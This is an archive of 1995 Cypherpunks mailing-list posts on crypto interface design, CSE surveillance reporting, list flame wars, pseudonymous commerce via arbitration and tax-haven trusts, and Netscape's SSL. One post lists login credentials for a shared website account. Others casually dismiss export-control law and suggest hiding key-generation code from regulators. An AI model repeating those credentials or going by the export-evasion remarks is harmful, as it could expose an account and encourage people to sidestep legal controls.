protocols as evidence; if they refuse the case is thrown out of 
court (precedent: UK and US phantom-ATM withdrawal cases)







From tcmay at got.net  Sat Nov 18 11:25:15 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 19 Nov 1995 03:25:15 +0800
Subject: ZD Net Update v.1 #2
Message-ID: <acd36fae03021004cda7@[205.199.118.202]>


At 5:11 PM 11/18/95, ZD Net / World Wide Web Edition wrote:
>__________________________________ZD Net Update_______________________________
>v. 1 #2                                                               11-13-95
>
>Welcome to ZD Net Update, the free E-mail newsletter created especially for
>registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition.
>ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting
>developments on ZD Net.


(rest of long newsletter deleted....)

Ah, someone has once again subscribed the Cypherpunks list to a newsletter.

Will the person who did this please have the decency to reverse this
situation? (There are instructions at the end, but the syntax of the
"unsubscribe" command may imply that only the site from which the subscribe
was initiated can unsub. Whomoever subscribed us can unsub us.)

Do I have to point out that just a single one of these long newsletters
takes up more list bandwidth the most of the putatively "off-topic" posts
do?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From aleph1 at dfw.net  Sat Nov 18 11:36:01 1995
From: aleph1 at dfw.net (Aleph One)
Date: Sun, 19 Nov 1995 03:36:01 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181441.JAA02040@homeport.org>
Message-ID: <Pine.SUN.3.90.951118131853.27991A-100000@dfw.net>


On Sat, 18 Nov 1995, Adam Shostack wrote:

> 	A daemon per user, or per machine?  Either way, I think you
> run into problems on a big multi-user machine.  (Either its an extra
> process or two per person, or its a great target for attack &
> subversion.

	Not any more are target for attack than a shared library.

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 






From raph at c2.org  Sat Nov 18 11:43:15 1995
From: raph at c2.org (Raph Levien)
Date: Sun, 19 Nov 1995 03:43:15 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.BSD.3.91.951118163828.463A-100000@usr3.primenet.com>
Message-ID: <199511181926.LAA26947@infinity.c2.org>


atilla brings up many good points, including:
> one of the biggest problems with _any_ crypto system, and pgp is 
> no exception, is tmp files, followed closely by insecure memory.
> insecure memory is a separate issue, but some of the temporary file
> problems can be relegated to reduced risk by passing the daemon the
> user's preferred location for tmp file --for instance, [...]

   An even better solution is to design the cryptosystem so that it
doesn't _need_ temp files int he first place. MOSS wins, PGP loses. I
don't know enough about S/MIME to say.

   In a related vein, Darren New <dnew at sgf.fv.com> sent me a pointer
to First Virtual's SMXP (Simple Mime eXchange Protocol). This is a
cool protocol that does about 50% of what I'm talking about. If you're
interested, here it is:
      ftp://ftp.fv.com/pub/docs/smxp-spec.{ps,txt}

   In order to adapt SMXP into something that's useful for what I've
proposed, numerous changes would need to be made:

* Unix Domain Sockets instead of TCP

* Add negotiation

* Add authentication

   Without these three changes, the system is nearly useless for
crypto. Further, there are two "aesthetic" points I'd like to see
claned up given the chance. First, SMXP makes the "ASCII assumption."
Since the daemon and app will be tightly coupled, definitely running
on the same machine, there is no reason to exclude binary MIME
objects. On the other hand, as far as I know, all of the MIME crypto
protocols are ASCII based (somebody please correct me if S/MIME is the
exception).
   Second, in order to support operation without temp files, it's
necessary to interleave the operations of transferring the object from
the app to the daemon and vice versa. I have a proposal for a
lower-level spec which can handle this quite readily, if anyone is
interested.

   Unfortunately, the proposal doesn't look much like SMXP. However,
the possibility of creating a prototype based on SMXP is intriguing.

Raph

P.S. Did anyone see the mention of the perl/RSA CJR in the latest
Wired? Managed to get the attribution wrong. Still no response.





From norm at netcom.com  Sat Nov 18 12:30:18 1995
From: norm at netcom.com (Norman Hardy)
Date: Sun, 19 Nov 1995 04:30:18 +0800
Subject: Request for URL'S
Message-ID: <acd3e86c040210041c67@DialupEudora>


At 7:31 PM 11/6/95, Censored Girls Anonymous wrote:
....
>I'd love to make a Cypherpunk URL page,
>so if you will send your five favorite URL's
>I'll put them all on a page like The Dreams Page,
>(http:www.primenet.com/~carolab/dreams.html)
>and turn it loose on the net.

The following seems to be a pretty good nexus:
http://www.quadralay.com/www/Crypt/Crypt.html

There is, of course
http://www.oberlin.edu/~brchkind/cyphernomicon/

A crypto legal centre:
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Happy Hunting







From Richard.Johnson at Colorado.EDU  Sat Nov 18 13:11:35 1995
From: Richard.Johnson at Colorado.EDU (Richard Johnson)
Date: Sun, 19 Nov 1995 05:11:35 +0800
Subject: RealAudio website TEMPORARY PASSWORD
Message-ID: <v02130504acd3f2635e65@[204.144.184.50]>


>
>          Username: cpunks
>TEMPORARY Password: New.Norfolk
>
I assume that temp password will be changed to cypherpunks soon.

Note that

          Username: cypherpu   [8 char limit]
          Password: cypherpunks

also works.  Someone set it up a few months ago.

Richard







From s1113645 at tesla.cc.uottawa.ca  Sat Nov 18 13:31:26 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sun, 19 Nov 1995 05:31:26 +0800
Subject: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181926.LAA26947@infinity.c2.org>
Message-ID: <Pine.3.89.9511181615.A21921-0100000@tesla.cc.uottawa.ca>




On Sat, 18 Nov 1995, Raph Levien wrote:

>    An even better solution is to design the cryptosystem so that it
> doesn't _need_ temp files int he first place. MOSS wins, PGP loses. I
MOSS?






From anonymous-remailer at shell.portal.com  Sat Nov 18 15:37:02 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 19 Nov 1995 07:37:02 +0800
Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
Message-ID: <199511182325.PAA04123@jobe.shell.portal.com>


On Sat, 18 Nov 1995 anonymous-remailer at shell.portal.com wrote:

> >Taking three successive news stories from three days ... (press stories,
> >I've since pulled for my own reference) and pasting them together to
> >indicate some type of Machiaevellian?? (sp) exercise is simply "not done." 
> 
> I still feel such a sense of violation with what LD did, such an utter
> sense of helplessness at the character assassination I've suffered at his
> hands, that I feel that I must take some token action to "set the
> record straight".  Something which clears my name.
> 
> Here is the TRUE unedited story for the list which Deitweiler felt he
> had to TWIST to the nth degree.  His attempt at making mountains out
> of mole hills will not succeed with this one.

This story truly is a non-starter.  Big deal.  It really has no
relevance to this international list.  This is simply a Canadian matter.

So Canada spied on its allies -- Mexico and South Korea particularly --
and possibly picked up some information which helped Canada to outbid
the United States on a lucrative wheat deal with China.

So what??  As they say ... you snooze you loose.  

Deitweiler's attempt to get American farmers into the picture isn't
going to work.  The part about wheat sales isn't even remotely
relevant to the story.  It's a single paragraph.

CSE has a mandate and follows it.  No one needs to listen to
Deitweiler's rantings and whinings, and his so-called outrage.

As the box at the end of the story shows, Canada simply doesn't
currently have the budget to do a really broad search of the United
States or Mexico.  It just can't pick up every American's phone calls.

The story isn't about that.  It's simply about listening in on a
woman's phone call to her doctor.  His attempt to make more out of
this than what is actually there, and in the process to sully my good
name won't work.

Let the readers judge for themselves, based on the ORIGINAL stories
rather than LD's cut and paste and his personal *commentary*.  And
hopefully no one will judge me, for his words.  

Let the story simply speak for itself.




SPY WORLD
Electronic snooping part of the trade game with friendly countries

Intelligence agencies comb the airwaves for useful data

Jim Bronskill
The Canadian Press
OTTAWA

  Intelligence experts said Monday it's no big secret that Canada's
high-tech spy agency snoops on friendly countries for financial gain.
  Increasingly, intelligence agencies around the world are using their
antennas, computers and codebreakers to gather economic information,
said Wesley Wark, a University of Toronto history professor.
  Some of Canada's largest trading partners -- including the United
States, France and Japan -- comb the airwaves for useful information,
so Canada would be foolish not to join the game, said Wark.
  "I don't know what a friendly power in the economic sphere is,
exactly, these days," he said.  "That seems to be a very ambiguous
term."
  Canada's secretive Communications Security Establishment -- an arm
of the Defence Department -- collects and analyses communications
traffic on the activities of foreign states, corporations and people.
  Jan Shorten, a former CSE employee, told CTV News in an interview
Sunday the agency spied on Canada's allies and trading partners --
including Mexico and South Korea -- by eavesdropping on embassies,
consulates and diplomats.
  In a follow-up segment for broadcast Monday, Shorten said the CSE
frequently intercepted telephone conversations and faxes of Canadians
working at foreign embassies in Canada.
  The government acknowledged earlier this year it uses CSE data to
help develop foreign and defence policies.
  In New Zealand where a meeting of Commonwealth countries just
wrapped up, Prime Minister Jean Chretien did not deny Canada is spying
on allies.
  "This is an organization that works within the law of Canada,"
Chretien told reporters. "They do not report to me on a daily basis
and I cannot make any comments on if they are spying on anybody, I
don't know.
  "But they have a mandate to check a few things around the world.
Probably somebody is listening to us at this moment."
  The prime minister also said that of any laws have been broken,
"somebody will have to pay the price."
  In a book published last year, former CSE employee Mike Frost told
how the agency electronically picked up information that helped Canada
outbid the United States on a lucrative 1982 wheat deal with China.
  Such clandestine behaviour may be unethical, but countries do it,
said U.S. journalist David Kahn, who has written extensively on
intelligence matters.
  "It's just too valuable to give up," said Kahn, a visiting historian
at the National Security Agency, the CSE's much larger U.S. cousin.
  "I wouldn't be surprised if the United States was trying to break
Canadian codes."
  Ottawa maintains that the CSE, the NSA and their counterparts in
Britain, Australia and New Zealand have all agreed not to spy on each
other.
  The government also says the CSE does not target Canadians and
scrupulously abides by Canadian laws.
  Shorten said the CSE stepped up its operations against foreign
embassies in Canada in 1991.  She recalled hearing conversations of
Canadinas employed there -- even one woman's phone call to her doctor.
  An appalled Shorten eventually confronted her boss, who assured her
the practice was legal.
  The agency is obligated to destroy information about Canadians it
scoops up in its electronic net, said Wark.  A rare exception might be
a phone call describing a terrorist plot.

[The story also had a little box with some Quick Facts in it]


                   QUICK FACTS

 EMPLOYEES:  About 900
 
 1995-96 BUDGET: $113 Million

 HQ:   Sir Leonard Tilley Building, 
       behind a three metre fence tipped
       with barbed wire in south Ottawa.

 ROLE: Secretive arm of Defence Department monitors and anlyses
       communications about activities of foreign states, corporations
       and individuals.  Also helps government stop Canadian signals
       from being intercepted.

SHARES: Intelligence with counterparts in United States, Britain,
        Australia, New Zealand.



And that's all she wrote ... 





From perry at piermont.com  Sat Nov 18 16:06:31 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 19 Nov 1995 08:06:31 +0800
Subject: CANADIAN PRESS REPORTS (was Re: CSE gets flak on TV)
In-Reply-To: <199511182325.PAA04123@jobe.shell.portal.com>
Message-ID: <199511182351.SAA00184@jekyll.piermont.com>



I hope everyone realizes that Detweiler is probably arguing with
himself, three levels deep. I must admit that the levels he stoops to
in order to draw attention to himself are pathetic. Why don't you just
stick to posting as Vlad Nurzi? Its more dignified.

anonymous-remailer at shell.portal.com writes:
> On Sat, 18 Nov 1995 anonymous-remailer at shell.portal.com wrote:
> 
> > >Taking three successive news stories from three days ... (press stories,
> > >I've since pulled for my own reference) and pasting them together to
> > >indicate some type of Machiaevellian?? (sp) exercise is simply "not done."
 
> > 
> > I still feel such a sense of violation with what LD did, such an utter
> > sense of helplessness at the character assassination I've suffered at his
> > hands, that I feel that I must take some token action to "set the
> > record straight".  Something which clears my name.
> > 
> > Here is the TRUE unedited story for the list which Deitweiler felt he
> > had to TWIST to the nth degree.  His attempt at making mountains out
> > of mole hills will not succeed with this one.
> 
> This story truly is a non-starter.  Big deal.  It really has no
> relevance to this international list.  This is simply a Canadian matter.





From ericande at cnw.com  Sat Nov 18 16:23:11 1995
From: ericande at cnw.com (Eric Anderson)
Date: Sun, 19 Nov 1995 08:23:11 +0800
Subject: Visual Basic 4.0 encryption prog.
Message-ID: <01BAB5D0.4CBEAEE0@king1-04.cnw.com>


	I just scored a copy of visual basic 4.0 and I was wondering how feasible it would be to write a program for Window$ 95 that would use RSA or IDEA and the Win95 exchange interface. I plan on buying Applied Cryptography probably on Fri. when I get paid.
	My requirements/goals are: 100% compatibility with M$ Exchange, ease of use (Point & Click/ drag & drop) and last but not least, STRONG public key encryption using "off-the shelf
code. 
	So my ??? Is this: Is it possible? Or should I just go out and buy a C++ compiler.
I don't really care about ITAR or any of that other BS, I just won't put MY name on it.






From chen at intuit.com  Sat Nov 18 16:57:45 1995
From: chen at intuit.com (Mark Chen)
Date: Sun, 19 Nov 1995 08:57:45 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.SOL.3.91.951116161656.19526G-100000@chivalry>
Message-ID: <9511170143.AA07316@doom>



> On Thu, 16 Nov 1995, Scott Brickner wrote:
> > 
> > You'd need a program which not only *accepted* the additional parameter,
> > but also *needed* the second parameter.  I confess I have some difficulty
> > thinking of one.
> 
> It's not too hard to think of a compression scheme that needs extra 
> information to be passed from client to server; the obvious example is 
> some sort of dictionary compression with external dictionaries (can be 
> very effective for short messages where LZW etc never get a chance to get 
> going). 
> 
> Another, more likely case, is where the object could have been compressed 
> by several schemes, and a scheme ID is needed to determine which 
> alogorithm to use. 

But the problem is more on the application side than on the library
side.  If necessary, you can simply design the plug-in crypto function
to regard the first n bytes of the input buffer as a key.  On the
other hand, how do you explain why your application (for which you're
seeking export approval) is generating keys in the first place?  And
what's this other piece of code over here that just sits around and
captures mouse movements at random intervals? :)

   - Mark -


--
Mark Chen 
chen at intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D





From sinclai at ecf.toronto.edu  Sat Nov 18 17:01:13 1995
From: sinclai at ecf.toronto.edu (SINCLAIR DOUGLAS N)
Date: Sun, 19 Nov 1995 09:01:13 +0800
Subject: [NOISE] LD is Canadian?
In-Reply-To: <199511182351.SAA00184@jekyll.piermont.com>
Message-ID: <95Nov18.194403edt.330@cannon.ecf.toronto.edu>


> I hope everyone realizes that Detweiler is probably arguing with
> himself, three levels deep. I must admit that the levels he stoops to
> in order to draw attention to himself are pathetic. Why don't you just
> stick to posting as Vlad Nurzi? Its more dignified.

Appealing as the idea is, some of these posts have shown a good understanding
of Canadian politics and current events.  I think it unlikely that LD could
have written all of them.





From anonymous-remailer at shell.portal.com  Sat Nov 18 17:07:51 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sun, 19 Nov 1995 09:07:51 +0800
Subject: negative reputation (was: WRITTEN CODE)
Message-ID: <199511190053.TAA21421@bb.hks.net>


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Daniel 'genius' Charpentier <drcharpe at hamlet.uncg.edu> wrote:

> he mentioned his desire to see more cryptographic program code and
> I didn't want to see this initiative die.  I am a new commer to
> cryptography and I know I shouldn't be posting yet but that is
> what I thought cypherpunk postings was supposed to be in the first
> place ( program code, protocols, and algorithms ).  Please don't
> flame me to badly for this message.  I am doing everything I am
> supposed to before posting ( reading the FAQ's, the entire
> cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )

It sounds like you are afraid of getting a negative reputation.
Well don't be.  Simply create a persistent pseudonym and sign your
messages with it instead.  That way, if it turns out that everyone
disagrees with you and/or flames you to death, you can simply
disgard your old pseudonym.  Otherwise you keep your pseudonym and 
continue to post under it.  This technique is not new, so you may 
already have seen it in the archive.

Logically, a pseudonym is simply a public key.  However you may want
to give it a human-readable name so other people may more easily refer 
to it.  If you decide to do this, I suggest that you do not name the key 
on its first post because there is a high probability that you will decide 
to disgard the key.  If you name it and throw it away, then you have
unnecessarily cluttered up the limited name space.

 - a new entity, as yet unnamed

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK5/P42Fr67QcvwZAQGVdwP5AaE5MR8JztPBv1k/0GdVlZSzuBBMboRW
d7Ofyw2EloKS7YTgb+ZoGDT92h+n5Yzpp5Jb5+0zm8iDLQbm0RTQJxE86Ty4DrO4
5w1CUCSa8VF4mTVoRvyaYrWHTq4uxOj4LAPC6Zxx5qIPUSRgceWoYsmEoarIYYLU
FEhnF34o5m0=
=T80R
- -----END PGP SIGNATURE-----

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzCuftgAAAEEAL35udZ/l0s590SjtzSM9eAepxAGe9Mp38ZoTsvfmNQh008W
sLtiYKmSYKBPuuRZIpYBZEjLZry5p6xHUpsKuflNXy7sdeHBviU+x8J57ip4DLx2
+tlv4dtjLKxzVGEqEfWOb3oRHCJ1t2IgV5A9RBzp2SXke56pTo2Fr67QcvwZAAUT
tBxhIG5ldyBlbnRpdHksIGFzIHlldCB1bm5hbWVk
=h9Uo
- -----END PGP PUBLIC KEY BLOCK-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMK5/9SoZzwIn1bdtAQFS0wF+NyWTvLIZr05q8O4LOCgM0W1lHKBy+iu3
P3k3Yy7+FIS15erO88CDpwIBbywqQ+Pa
=wJn0
-----END PGP SIGNATURE-----





From llurch at networking.stanford.edu  Sat Nov 18 17:32:38 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Sun, 19 Nov 1995 09:32:38 +0800
Subject: Spammers' Email List Obtained!!!
Message-ID: <Pine.ULT.3.91.951118170439.9992B-100000@Networking.Stanford.EDU>


-----BEGIN PGP SIGNED MESSAGE-----

Using only the tools provided by the spammer, and without compromising
system security in any way, we have obtained the full list of email
addresses that were used by the bulkd at valleynet.net direct email spammer.
I am not going to tell the public how to get it because I do not want this
list to fall into the wrong hands. 

There are several curious features about the list that strongly suggest
that it was purchased from other spammers. I *strongly encourage* the
person who formerly used the bulkd at valleynet.net account to apologize to
news.admin.net-abuse.misc and provide us with the source of the list
immediately. 

- -rich
 llurch at networking.stanford.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK6E943DXUbM57SdAQHopwP/aY+cRnmrtUBhILl7lvfeQakrpW+uLwuY
J1jR6SrSFdiZ+rGM8D4tc5HarOrU77X2zjpqDNOFySJ+yukP3eXvKny3v+3ndUGA
ozbnH5EnshOQZE0hQ+aV9TKu+zM0ihfT65PxuvgehPnBi+CgSRHtDddhjuWMvRSD
aNGKoAyZLaA=
=mKyw
-----END PGP SIGNATURE-----





From sdavidm at iconz.co.nz  Sat Nov 18 18:01:26 1995
From: sdavidm at iconz.co.nz (David Murray)
Date: Sun, 19 Nov 1995 10:01:26 +0800
Subject: Anonymity and Intellectual Capital
In-Reply-To: <199511160148.RAA18908@jobe.shell.portal.com>
Message-ID: <pnr598536982o@iconz.co.nz>


-----BEGIN PGP SIGNED MESSAGE-----

To pick up on a couple of Professor Post's ideas - limited liability of
untraceable pseudonyms, and choice of rule sets in cyberspace (see Post,
"Anarchy, State, and the Internet: An Essay on Law-Making in Cyberspace"
1995 J Online Law art 3), I suggest that arbitration is well suited to
pseudonymous commerce, and  propose the use of an old device - the 
unincorporated, or deed of settlement, company.

Contract seems likely to be the basic building block of pseudonymous digital
commerce for the forseeable future (barring a mathematical solution to the
non-repudiation problem). But, of course, contracts have to be enforced in
courts, which opens the whole thing to state intervention a la the unenforce-
ability of gambling contracts etc, and, generally requires the nym to front
up with some form of True Name to launch or defend proceedings...

On the other hand, ADR is hot, and arbitration has long been encouraged as a
method of settling commercial disputes without troubling the courts. It seems
to be getting easier to enforce arbitral awards and harder to appeal them, or
to bypass the arbitration in the first place.

And it is becoming easier to specify your own arbitration procedures (for
instance, those suited to pseudonymous parties presenting argument and evidence
untraceably via the net) and even to specify the substantive law of the 
arbitration, which need not be the law of any state (eg the UNCITRAL contract
law, or even "those laws accepted in international commerce").

So it would be possible for arbitral tribunals specially adapted to
pseudonymous digital commerce to somewhat shield transactions from the
procedural and substantive laws of any state that makes enforcement of those
transactions problematic.

Now, as Prof Post points out, the limited liability corporation is an efficient
device for the pooling of capital and the taking of business risks. But the
grant of incorporation is by the State, and the State usually requires certain
information - such as the name and address of the stockholders - as a
condition of that grant.

The last time State granted incorporations were in short supply, the merchants
of Britain developed (or redeveloped) the deed-of-settlement company -
essentially a partnership with a Board of managing partners, the assets of the
partnership vested in trustees, and the shares in the partnership easily
transferrable.

There were two major drawbacks to the deed of settlement company (which didn't
stop them being very popular, or their shares being widely traded):

1. Under the procedural laws of the day it was very difficult to sue or be
sued, because all of the partners (ie shareholders) at the time the cause of
action arose had to be named in the action. This was ameliorated by the use
of arbitration, and, occasionally, courts allowed the trustees to sue for
the company.

2. Lack of limited liability - a partner is personally liable for all the debts
of the partnership. This was ameliorated by providing in contracts entered
into by the company that recourse could only be had to partnersip assets - and,
of course, by the difficulty of suing such companies.

Both these can, at least partially, be overcome in psuedonymous digital
commerce - the first by the use of arbitration, and by more flexible modern
procedural rules (although, depending on the jurisdiction, this may not be a
complete answer); the second by the inherent limited liability of an
untraceable digital pseudonym.

Now, with a corporation in a tax haven jurisdiction acting as trustee (to
more than one company, potentially), someone/something acting as a registry
(attending to the transfer of shares in the company, and potentially many
other companies), an account at Mark Twain (held by the trustee company), and
an appropriate deed of settlement (or partnership agreement)  - oh, and some
object for the company - and now you've got something to do with your digicash!

;-)

As an historical aside, the reason unincorporated companies died out in Britain
was that they were outlawed when the general incorporation acts were
introduced - or, rather, existing companies were encouraged to incorporate
(where their deeds became their articles of association, and the objects of
the trust became the memorandum of association) and new ones were outlawed as
oversize (somewhere between 10 and 25, at various times) partnerships. In
England and Australia, at least, the prohibition on outsize partnerships still
continues, and special exceptions have to be made for Chartered Accountants,
Solicitors and architects.

Unincorporated companies were not so popular in the US (although Alexander
Hamilton (?) originally organized the Bank of New York as one) because, after
the revolution, general incorporation statutes were quick to be passed. (Which,
incidentally, is why the Commonwealth has companies and shares and articles,
and the US has corporations and constitutions and stocks. [Canada is the
exception that proves the influence of geography over history.]) On the other
hand, the Massechusetts (?) Business Trust can be seen as the ultimate devel-
opment of the concept (or, at least, that's what I read somewhere).

Dm.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMK0wFllo3j8JHzalAQFlZQQAnHmFwb4i+vbDRZDnZzn3himkhK8WXXRg
o5cKLOCA0I/7k1NZJrwvMKP8CxV6GxZIyNOTNvXnjKffzcDg5HP2uRHRZTQLVg0H
6zPVMORBdWFKs7LTK40CBViJlQAEGTUdYSAdqgKy0+KlBvs6fyGS8va/3gs2voYv
7qqt1NleQhU=
=l9ff
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]





From dlv at bwalk.dm.com  Sat Nov 18 18:34:15 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 10:34:15 +0800
Subject: Anderson on SSL
Message-ID: <iBiseD41w165w@bwalk.dm.com>


One of the mags I get for free is called _OEM_. It recently ran an interview
with Marc Anderssen from Netscape. I'll key in a few crypto-relevant passages.

...

Q. Everyone's looking for ways to make money on the World Wide Web. What is the
future for advertisers on the Web?

A. Advertisements in an interactive medium definitely function best as a
service; really, the line between advertising, informational marketing and
direct sales blurs incredibly quickly. I expect a lot of creativity to be
devoted to pulling people into commercial sites and keeping them there,
including continuing sponsorship of innovative content.

Q. Do you see many small transactions as a possible model for making money on
the Web?

A. Tiny transactions will be a part of the grand scheme of things. They'll make
possible the 2-cent joke of the day and lots of appropriate forms of content.

Q. How will people deal with getting costs down for each transaction to eke out
a profit?

A. That's the challenge for the companies that intent to make money processing
tiny transactions. I can't wait to see who does it first.

Q. Now that the InterNIC has started to charge for domain names, do you, as an
Internaut, miss the anarchistic, "anything goes" community the Net once was?

A. The Internet was never really anarchistic and "anything goes". It was always
a cooperative venture that everyone derived benefit from. That's pretty much
the case.

In fact, I still get a thrill -- more now than ever -- when I go through
directories like Yahoo. There's much more out there on the Net now. Everything
is accelerating.

...

Q. Do you think that the Netspace's Secure Sockets Layer (SSL) is the de facto
standard for Internet security now?

A. SSL is a de facto standard, widely adopted throughout the industry by
Microsoft, Novell, Apple, IBM, Sun, Digital Equipment, Intel, MasteCard, Visa,
etc. The security space is a very broad space, though, and SSL solves a
specifically defined set of problems: encryption and authentication for a
secure data channel over TCP/IP.

There are many other problems yet to solve. Other protocols will play a role in
solving those problems, and we will support them.

Q. What happened to the deal with Enterprise Integration Technologies and its
Secure Hypertext Protocol (S-HTTP), which was Netscape's only real competition
in the area of secure server software?

A. Early this year, we announced that Netscape (along with IBM/Prodigy, America
Online and Compuserve) became an investor and partner in Terisa Systems, which
was previously a joint venture of EIT and RSA Data Security. All Parties agreed
to support both SSL and S-HTTP.

Unfortunately, Terisa has been unable to ship its toolkit, so things haven't
gone as well as we had all hoped. In the meantime, virtually everyone is
supporting SSL [but not S-HTTP].

Q. Do you think that your server software, and especially your protocol Secure
Courier, will lessen the public perception that credit-card entries aren't safe
on the Net?

A. I think it's happening. We're in the middle of a broad shift in consumer
behavior, and there will be a lot of exciting things happening over the next
few years as a result. Things are definitely warming up right now.

Of course, one of the great things about doing business on the Net is that it's
a lot cheaper for the merchant than doing business in the "real" world. One of
the broad trends we're starting to see is that a lot of entrepreneurial
companies will be coming up on the Net. They, more than anyone, will help drive
the shift in consumer behavior by offering innovative goods and services and
innovative ways.

...

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From rah at shipwright.com  Sat Nov 18 19:29:05 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Sun, 19 Nov 1995 11:29:05 +0800
Subject: Anonymity and Intellectual Capital
Message-ID: <v02120d03acd44a063fd4@[199.0.65.105]>



>I suggest that arbitration is well suited to
>pseudonymous commerce, and  propose the use of an old device - the
>unincorporated, or deed of settlement, company.


First of all, this is a damn fine post. Outstanding!

The first thing that strikes me about all this is how time seems to be
"unwinding" as far as centralization of power, or anything else, is
concerned.

I've ranted about all this here and elsewhere, how falling semiconductor
prices, public networks and strong cryptography beget the reemergence of
bearer certificates, this time in digital form (of which ecash is only the
prima facie example, the existence proof) and what I call, for lack of a
better term, a "geodesic", instead of hierarchical, economy.

We're seeing in this "unincorporated company" idea the devolution, the
surfacting, of concentrations of information, and thus power, back out to
individuals, and with that, responsibility, and of course, freedom.

Truly marvelous. Hope there's more where that one came from.

Cheers,
Bob Hettinga





-----------------
Robert Hettinga (rah at shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf at clark.net  http://www.netresponse.com/zldf <<<<<







From sameer at c2.org  Sat Nov 18 19:58:33 1995
From: sameer at c2.org (sameer)
Date: Sun, 19 Nov 1995 11:58:33 +0800
Subject: e$: Come aaaannnndddd Get it!
In-Reply-To: <acd0ba0e02021004a15b@[205.199.118.202]>
Message-ID: <199511170520.VAA28087@infinity.c2.org>


> 
> 3. The success of BankAmericard (later renamed Visa) came when real
> customers and real shops started to use it, not when early pioneers set
> themselves up as clearinghouses and whatnot.

	I'm sorry, but Community ConneXion is a real shop, with real
customers, selling real services, and we accept ecash. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer at c2.org





From s1113645 at tesla.cc.uottawa.ca  Sat Nov 18 20:06:51 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sun, 19 Nov 1995 12:06:51 +0800
Subject: Anonymity and Intellectual Capital
In-Reply-To: <pnr598536982o@iconz.co.nz>
Message-ID: <Pine.3.89.9511182108.B25524-0100000@tesla.cc.uottawa.ca>




On Sat, 18 Nov 1995, David Murray wrote:

> To pick up on a couple of Professor Post's ideas - limited liability of
> untraceable pseudonyms, and choice of rule sets in cyberspace (see Post,
> "Anarchy, State, and the Internet: An Essay on Law-Making in Cyberspace"
> 1995 J Online Law art 3), I suggest that arbitration is well suited to
Great! Where? (damn I should keep my older posts for a bit longer)

> pseudonymous commerce, and  propose the use of an old device - the 
> unincorporated, or deed of settlement, company.

Interesting. I just read that Liechtenstein allows anonymous corporations
(as in you register for it anonymously). I'm curious to know how this 
works (if I've got it right). It might also become rather interesting 
when one enterprising tax haven permits registration for these things 
online (and hopefully automatically, for the proper anon fee).

Barring escrow services, I don't see how contracts (or a lot of 
other laws) could be enforced against these entities when they can simply pop 
in and out of existence (unless they have some physical counterpart, like 
a storefront and merchandise. But then these are easily linkable to True 
Names, unlike software companies, financial services or any other part of 
the info economy.)

The value of a reputation is not particularly high in lots of cases or is 
occasionally worth throwing over for a big one-time scam. (Pyramid scams
for "reputable" banks)
While I'd love to set one up, I would never do any risky commerce with one.

Besides, if companies in general can set up other companies, in a 
trustworthy and non-anon jurisdiction, couldn't these foreign anon companies 
do the same in the present system and therefore make it very hard to know 
if any company in any country is non-anon? Are there any present legal 
barriers against this? 

I don't know much about the requirements of incorporation or the natures
of various types of corporations, so please feel free to correct me.
I'm not completely sure I understood your explanation of a 
deed-of-settlement corp. and the idea of an "unincorporated" company. 
(Unincorporated in what way, and what were the registration and ID 
requirements?)

Any references? Thanks.

Ps. I know I could probably look this up, but exactly what are bearer bonds?
I frequently hear them mentioned when market anonymity and money laundering 
come up.






From nowhere at bsu-cs.bsu.edu  Sat Nov 18 20:20:59 1995
From: nowhere at bsu-cs.bsu.edu (Anonymous)
Date: Sun, 19 Nov 1995 12:20:59 +0800
Subject: .Sig Heilarchy
Message-ID: <199511190403.XAA28059@bsu-cs.bsu.edu>




